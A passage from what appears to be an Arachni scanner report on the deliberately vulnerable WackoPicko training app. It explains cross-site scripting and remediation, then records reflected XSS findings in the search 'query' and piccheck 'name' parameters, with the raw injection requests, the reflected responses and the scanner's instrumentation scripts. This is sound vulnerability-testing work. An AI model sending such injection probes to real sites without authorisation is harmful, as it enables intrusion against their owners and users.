</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.
Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.
Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:
&<>"'/An example of HTML entity encoding is converting < to <.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
Each of these locations have their own form of escaping and filtering.
Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.
form
input
query
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/pictures/search.php
.
0 1 2 3 4 5 | <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> </input> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/pictures/search.php |
|
|
http://192.168.0.26/WackoPicko/pictures/search.php?query=1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec/%3E
Raw HTTP request used to retrieve the page.
GET /WackoPicko/pictures/search.php?query=1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:54 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 942
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>"/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'</h2>
<div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
<h3 class="error">No pictures here...</h3>
</ul>
</div>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
name
using
POST
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/piccheck.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | <form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="30000"> </input> Check this file: <input name="userfile" type="file"> </input> <br> </br> With this name: <input name="name" type="text"> </input> <br> </br> <br> </br> <input type="submit" value="Send File"> </input> <br> </br> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/piccheck.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/piccheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Content-Length: 104 Content-Type: application/x-www-form-urlencoded MAX_FILE_SIZE=30000&userfile=arachni_user&name=arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 907
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Checking your file arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></h2>
<p>
File is O.K. to upload!
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
form
input
username
using
POST
at
http://192.168.0.26/WackoPicko/users/login.php
pointing to
http://192.168.0.26/WackoPicko/users/login.php
.
